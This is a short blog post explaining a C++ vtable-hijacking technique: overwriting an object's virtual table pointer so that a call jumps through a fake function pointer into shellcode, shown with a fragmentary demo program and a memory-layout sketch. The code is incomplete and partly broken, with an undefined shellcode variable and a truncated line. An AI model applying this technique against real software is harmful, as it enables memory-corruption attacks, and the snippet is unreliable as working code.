Monday, December 28, 2009

Exploiting C++ virtual function

Object | Vtable
---------
Vtable pointer -----> Virtual function_1---> Virtual function1()


class Failwest
{
public :
char buf[200];
virtual void test(void)
{
cout<<"Class Vtable::test()"< }
}

Failwest overflow, *p;
void main(void)
{
char * p_vtable;
p_vtable= overflow.buf-4 ; // point to virtual table
p_vtable[0]=0xCC;
p_vtable[1]=0x88;
p_vtable[2]=0x40;
p_vtable[3]=0x00;
strcpy(overflow.buf, shellcode)
......
}

Layout of the object

vtable pointer
(0x004088cc)
--------------------
shellcode
--------------------
fake virtual function pointer

Flow : vtable pointer ---> fake virtual function pointer ----> shellcode

1 comment: